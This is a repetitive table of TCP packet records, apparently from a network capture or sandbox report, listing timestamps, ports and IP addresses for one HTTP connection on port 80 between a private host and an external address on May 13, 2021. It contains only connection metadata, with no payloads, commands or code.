May 13, 2021 08:29:34.406800032 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406822920 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406861067 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406888962 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406898022 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406933069 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406934977 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.406961918 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.406972885 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407005072 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407011032 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407047987 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407051086 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407064915 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407094002 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407099962 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407135963 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407166958 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407172918 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407198906 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407210112 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407236099 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407248020 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407273054 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407284975 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407311916 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407322884 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407336950 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407360077 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407386065 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407408953 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407409906 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407452106 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407488108 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407489061 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407526016 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407526970 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407555103 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407565117 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407578945 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407601118 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407634974 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407638073 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407649994 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407675028 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407687902 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407721996 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407752991 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407763004 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407777071 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407799959 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407814026 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407836914 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.407857895 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.407882929 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.513708115 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.513936996 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.680429935 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.680494070 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.680775881 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.703279018 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.703337908 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.703367949 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.703397989 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.703427076 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.703457117 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.703650951 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.703974009 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704011917 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704057932 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704098940 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704135895 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704144955 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704174042 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704205036 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704230070 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704241991 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704252958 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704284906 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704296112 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704318047 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704334021 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704365015 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704371929 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704411030 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704425097 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704431057 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704447031 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704487085 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704524040 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704555035 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704564095 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704570055 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704571009 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704579115 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704612970 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704643965 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704649925 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704679012 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704688072 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704711914 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704726934 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704787016 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704793930 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704803944 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704824924 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704849005 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704864025 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704910040 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704910994 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704921007 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.704952955 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.704989910 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705027103 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705049992 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705063105 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705065012 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705118895 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705121040 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705158949 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705159903 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705171108 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705197096 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705221891 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705244064 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705271006 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705286026 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705312967 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705322981 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705358982 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705362082 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705423117 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705429077 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705430031 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705475092 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705512047 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705540895 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705549955 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705584049 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705593109 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705621958 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705638885 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705641985 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705679893 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705717087 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705744028 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705754042 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705760956 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705790997 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705807924 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705828905 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705843925 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705867052 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705904007 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705936909 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705950022 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.705956936 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.705992937 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706008911 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706028938 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706068039 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706079960 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706090927 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706105947 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706141949 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706161976 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706172943 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706180096 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706198931 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706217051 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706253052 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706264019 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706289053 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706305981 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706342936 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706381083 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706396103 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706403971 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706418991 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706439018 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706456900 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706495047 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706499100 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706531048 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706532955 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706558943 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706578970 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706594944 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706621885 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706657887 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706685066 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706695080 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706713915 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706732035 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706753969 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706768990 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706780910 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706806898 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706828117 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706842899 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706851006 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706890106 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706932068 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706950903 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.706968069 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.706995010 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707005024 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707017899 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707043886 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707066059 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707079887 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707093000 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707117081 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707143068 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707154989 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707180023 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707200050 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707201004 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707242966 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707259893 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707278967 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707307100 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707317114 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707329988 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707355022 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707376003 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707391024 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707405090 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707428932 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707468033 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707492113 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707511902 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707514048 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707556009 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707592964 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707614899 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707629919 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707649946 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707668066 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707689047 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707704067 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707715988 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707741976 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707777977 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707799911 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707824945 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707827091 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707869053 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707881927 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707905054 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707911968 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.707942009 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707979918 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.707998991 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708015919 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708028078 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708054066 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708069086 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708091021 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708096981 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708137035 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708151102 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708178997 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708192110 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708215952 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708234072 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708254099 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708259106 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708292007 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708322048 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708328009 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708339930 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708365917 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708403111 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708424091 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708447933 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708451033 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708492994 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708508015 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708528996 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708549976 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708569050 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708580971 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708606958 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708626986 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708643913 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708662987 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708683968 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708692074 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708723068 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708766937 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708770037 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708782911 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708811045 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708848000 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708869934 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708888054 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708895922 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708925962 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708942890 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.708961964 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.708969116 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.709000111 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.709036112 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.709057093 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.709081888 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.709083080 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.709124088 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.709139109 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.709160089 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.709167004 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.709197044 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.709239960 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.709252119 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.709275961 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.709280014 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.709312916 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.709351063 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.709408045 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.709417105 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.709420919 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.709427118 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.709475040 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.807152033 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.807431936 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.974024057 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.974085093 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.974257946 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.977621078 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.999775887 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.999828100 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.999866962 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.999902964 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.999903917 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.999948978 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.999953032 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:34.999991894 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:34.999995947 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.000003099 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.000026941 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.000053883 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.002643108 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.002679110 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.002712965 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.002723932 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.002736092 CEST	49167	80	192.168.2.22	3.36.53.50
May 13, 2021 08:29:35.002748966 CEST	80	49167	3.36.53.50	192.168.2.22
May 13, 2021 08:29:35.002760887 CEST	49167	80	192.168.2.22	3.36.53.50
